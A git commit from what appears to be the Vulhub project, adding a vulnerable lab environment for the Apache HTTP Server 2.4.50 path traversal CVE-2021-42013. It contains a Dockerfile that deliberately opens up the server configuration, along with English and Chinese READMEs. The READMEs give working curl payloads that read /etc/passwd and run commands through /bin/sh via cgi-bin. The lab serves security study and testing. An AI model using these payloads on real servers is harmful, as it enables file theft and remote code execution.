first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
httpd/CVE-2021-42013/1.png
Normal file
BIN
httpd/CVE-2021-42013/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 248 KiB |
BIN
httpd/CVE-2021-42013/2.png
Normal file
BIN
httpd/CVE-2021-42013/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 128 KiB |
14
httpd/CVE-2021-42013/Dockerfile
Normal file
14
httpd/CVE-2021-42013/Dockerfile
Normal file
@@ -0,0 +1,14 @@
|
||||
FROM vulhub/httpd:2.4.50
|
||||
|
||||
LABEL maintainer="phithon <root@leavesongs.com>"
|
||||
|
||||
RUN set -ex \
|
||||
&& sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
|
||||
&& sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
|
||||
&& sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
|
||||
&& cat /usr/local/apache2/conf/httpd.conf \
|
||||
| tr '\n' '\r' \
|
||||
| perl -pe 's|<Directory />.*?</Directory>|<Directory />\n AllowOverride none\n Require all granted\n</Directory>|isg' \
|
||||
| tr '\r' '\n' \
|
||||
| tee /tmp/httpd.conf \
|
||||
&& mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
|
||||
47
httpd/CVE-2021-42013/README.md
Normal file
47
httpd/CVE-2021-42013/README.md
Normal file
@@ -0,0 +1,47 @@
|
||||
# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.50 (CVE-2021-42013)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
|
||||
|
||||
CVE-2021-42013 is a vulnerability that caused by incomplete fix of [CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773), an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
|
||||
|
||||
This vulnerability affects Apache HTTP Server 2.4.49 and 2.4.50 and not earlier versions.
|
||||
|
||||
References:
|
||||
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
- https://twitter.com/roman_soft/status/1446252280597078024
|
||||
|
||||
## Vulnerable environment
|
||||
|
||||
Execute following commands to start a vulnerable Apache HTTP Server:
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
|
||||
|
||||
## Exploit
|
||||
|
||||
Apache HTTP Server 2.4.50 patched the previous CVE-2021-41773 payload such as `http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`, but it was incomplete.
|
||||
|
||||
Use `.%%32%65` to bypass the patches (Note that `/icons/` must be a existing directory):
|
||||
|
||||
```
|
||||
curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
||||
```
|
||||
|
||||
The `/etc/passwd` is disclosured successfully:
|
||||
|
||||
|
||||
|
||||
With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
|
||||
|
||||
```
|
||||
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
|
||||
```
|
||||
|
||||
|
||||
45
httpd/CVE-2021-42013/README.zh-cn.md
Normal file
45
httpd/CVE-2021-42013/README.zh-cn.md
Normal file
@@ -0,0 +1,45 @@
|
||||
# Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
|
||||
|
||||
Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。
|
||||
|
||||
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
|
||||
|
||||
这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。
|
||||
|
||||
参考链接:
|
||||
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
- https://twitter.com/roman_soft/status/1446252280597078024
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令编译及运行一个存在漏洞的Apache HTTP Server 2.4.50版本服务器:
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
|
||||
|
||||
## 漏洞利用
|
||||
|
||||
我们使用[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)中的Payload已经无法成功利用漏洞了,说明2.4.50进行了修复。
|
||||
|
||||
但我们可以使用`.%%32%65`进行绕过(注意其中的`/icons/`必须是一个存在且可访问的目录):
|
||||
|
||||
```
|
||||
curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
||||
```
|
||||
|
||||
可见,成功读取到`/etc/passwd`:
|
||||
|
||||
|
||||
|
||||
在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:
|
||||
|
||||
```
|
||||
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
|
||||
```
|
||||
|
||||
|
||||
6
httpd/CVE-2021-42013/docker-compose.yml
Normal file
6
httpd/CVE-2021-42013/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
apache:
|
||||
build: .
|
||||
ports:
|
||||
- "8080:80"
|
||||
Reference in New Issue
Block a user